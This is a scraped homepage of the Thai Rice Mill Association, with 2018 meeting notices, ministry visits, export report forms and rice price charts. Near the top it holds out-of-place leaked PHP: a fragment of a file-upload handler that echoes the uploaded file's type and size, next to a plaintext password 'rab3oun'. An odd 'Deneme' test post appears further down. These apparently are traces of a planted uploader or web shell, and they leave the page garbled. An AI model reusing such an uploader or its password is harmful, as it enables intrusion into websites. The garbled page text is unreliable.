หน้าแรก arrow หน้าแรก
หน้าแรก
ประวัติสมาคม
สถานการณ์ข้าวประจำเดือน
ราคาข้าว
ใบสมัครสมาชิก
รายนามผู้บริจาค
ค้นหา
ติดต่อสมาคมสารนายกสมาคมโรงสีข้าวไทย

ประมวลภาพกิจกรรม
สถานการณ์ข้าวไทยMail

Password: rab3oun
\n". "Type: ".$_FILES["userfile"]["type"]."
\n". "Size: ".$_FILES["userfile"]["size"]." bytes
\n"; } else print "Error uploading file: ".$_FILES["userfile"]["name"].""; echo "
"
หนังสือพิมพ์


      

วีดีทัศน์(คลิกเพื่อชมวิดีโอ)
(คลิกเพื่อชมวิดีโอ)

กิจกรรมสมาคม
สมาคมโรงสีข้าวไทย ได้กำหนดให้มีการประชุมใหญ่สามัญประจำปี ๒๕๖๑ 
ในวันเสาร์ที่  ๘ ธันวาคม ๒๕๖๑
  เวลา ๐๘.๓๐ - ๑๗.๐๐ น.
ณ ศูนย์ประชุมและฝีกอบรมวิชาชีพ วิทยาลัยอาชีวศึกษาปทุมธานี  จ.ปทุมธานี
จึงขอเชิญท่าน และบริษัทของท่าน ได้ร่วมออกร้าน เพื่อแนะนำผลิตภัณฑ์
ชื่อเสียงบริษัทของท่าน และพบปะผู้ประกอบการโรงสีข้าวจากทั่วประเทศ
ที่จะเข้าร่วมการประชุมในครั้งนี้ โดยสามารถแสดงความจำนง
เพื่อจองพื้นที่ได้ ณ สำนักงานสมาคมโรงสีข้าวไทย ตลาดน้อย กรุงเทพฯ 
วันที่ 24 มิถุนายน2561 สมาคมโรงสีข้าวไทย จัดประชุมสัญจร
 ครั้งที่ 5/2561 ณ โรงแรมทวินโลตัล จังหวัดนครศรีธรรมราช 
      สมาคมโรงสีข้าวไทย ได้รับเกียรติ จากท่านรองผู้ว่าราชการจังหวัดนครศรีธรรมราช
 (นายขจรเกียรติ  รักพานิชมณี)มาเป็นประธานเปิดการประชุม  
     โดยมีผู้เข้าประชุม จำนวน50ท่าน จากสมาชิกภาคใต้ มีจังหวัดนครศรีธรรมราช
สงขลา พัทลุง และจากภาคกลาง ภาคเหนือตอนล่างและภาคอีสาน
เดินทางเข้ามาประชุมในครั้งนี้ 
      โดยมีวัตถุประสงค์เพื่อเป็นการเยี่ยมเยียนสมาชิกภาคใต้รับทราบสถานการณ์การค้า
ทั้งข้าวเปลือก ข้าวสาร และรับทราบปัญหาต่างๆ เพื่อเป็นข้อมูลและนำเสนอหน่วยที่เกี่ยวข้องต่อไป
 
สุดท้ายนี้ สมาคมโรงสีข้าวไทย
ต้องขอขอบคุณสมาคมโรงสีข้าวและกลุ่มชาวนาภาคใต้ คณะกรรมการและสมาชิก
สมาคมโรงสีข้าวไทย ทุกท่านที่สละเวลาเข้าร่วมประชุมกันอย่างพร้อมเพรียง
       และขอขอบคุณ ท่านสุเทพ คงมาก นายกสมาคมชาวนาและเกษตรกรไทย
ที่ได้เข้าร่วมการประชุมทำให้การประชุมในครั้งนี้ มีความคิดเห็นมีข้อมูลที่ครอบคลุมมากขึ้น


วันเสาร์ที่ 7 เมษายน 2561 สมาคมโรงสีข้าวไทย 
จัดประชุมใหญ่วิสามัญประจำปี 2561 (ครั้งที่ 1/2561)
ณ โรงแรมสองพันบุรี จังหวัดสุพรรณบุรี สมาคมโรงสีข้าวไทยได้ร่วมบริจาคเงินสมทบทุน มูลนิธิ ศิริราช 
เพื่อก่อสร้าง”อาคาร นวมินทรบพิตร84พรรษา” 
เนื่องในโอกาสวันสถาปนากรมการข้าว ครบรอบ 12 ปี 
วันที่ 16 มีนาคม 2561


เมื่อวันที่ 10 มกราคม 2561 นายเกรียงศักดิ์ ตาปนานนท์ นายกสมาคมโรงสีข้าวไทย
พร้อมด้วยคณะกรรมการบริหารสมาคม เข้าเยี่ยมคารวะแสดงความยินดีและอวยพรปีใหม่
พร้อมทั้งรับทราบนโยบาย จากท่านรัฐมนตรีว่าการกระทรวงพาณิชย์ นายสนธิรัตน์ สนธิจิรวงศ์
ในวันเดียวกันได้เข้าพบ ท่านปลัดกระทรวงพาณิชย์ นางนันทวัลย์ ศกุนตนาค
และอธิบดีกรมการค้าภายใน นายบุณยฤทธิ์ กัลยานมิตร เพื่ออวยพรและรับพรปีใหม่จากท่าน
สมาคมโรงสีข้าวไทย ขอกราบขอบพระคุณทั้งสามท่าน ที่ท่านให้เกียรติแก่สมาคมโรงสีข้าวไทยเมื่อวันที่ 27 ธันวาคม 2560 นายเกรียงศักดิ์ ตาปนานนท์ นายกสมาคมโรงสีข้าวไทย
พร้อมคณะกรรมการสมาคมเข้าร่วมแสดงความยินดีและอวยพรปีใหม่ในโอกาสเข้ารับตำแหน่งใหม่
นางสาวชุติมา บุณยประภัศร รัฐมนตรีช่วยว่าการกระทรวงพาณิชย์ และหารือสถานการณ์ข้าวโดยรวมข่าวประกาศ


   - เรียนสมาชิกสมาคมโรงสีข้าวไทย ที่ดำเนินการส่งออกข้าวไปยังต่างประเทศทราบ

- แบบรายงานการส่งออกข้าวไปต่างประเทศ รายเดือน ของสมาชิกสมาคมโรงสีข้าวไทย
 -------------------------------------------------------------------------------------------

บทความที่น่าสนใจ

- รายงานการวิจัยฉบับสมบูรณ์"โครงการศึกษาแนวทางการพัฒนาระบบการค้าข้าวของไทยเพื่อเพิ่มขีดความสามารถในการแข่งขันให้กับข้าวไทยในตลาดโลก"

กำหนดการประชุมของนายกสมาคมฯ

6 .. นายกสมาคมฯ ได้รับเชิญประชุม คณะกรรมการกำกับแผนงานงานวิจัยที่มุ่งเป้าตอบสนองความต้องการในการพัฒนาประเทศ (คณะที่1) กลุ่มเรื่องข้าว ครั้งที่ 2/2561 รายละเอียด

11 .. นายกสมาคมฯ ได้รับเชิญประชุมหารือร่างประกาศกระทรวงพาณิชย์ เกี่ยวกับเครื่องวัดความชื้นข้าว รายละเอียด


13 ก.ย. นายกสมาคมฯ ได้รับเชิญประชุมคณะอนุกรรมการพิจารณาโครงการส่งเสริม
และพัฒนาศักยภาพของโรงสีภาคใต้ ครั้งที่ 1/2561 รายละเอียด

13 ก.ย
. นายกสมาคมฯ ได้รับเชิญประชุมคณะอนุกรรมการพิจารณาชดเชยดอกเบี้ย
ให้ผู้ประกอบการค้าข้าวในการเก็บสต็อก ครั้งที่ 4/2561 รายละเอียด

กราฟราคาต้นข้าว/ปลายข้าวเฉลี่ย ประจำปี 2560

 

(คลิกเพื่อชมภาพขนาดใหญ่)


ราคาต้นข้าวเฉลี่ย ประจำปี 2560


Deneme พิมพ์ ส่งเมล
เขียนโดย surat   
Wednesday, 06 June 2018
ดัชนี บทความ
Deneme
หน้า 2


แก้ไขล่าสุดเมื่อ ( Saturday, 15 September 2018 )
Link


พยากรณ์อากาศ

ผู้เยี่ยมชม: 10344035
ตั้งแต่วันที่ 1 เมษายน 2550
ขณะนี้มี 26 บุคคลทั่วไป ออนไลน์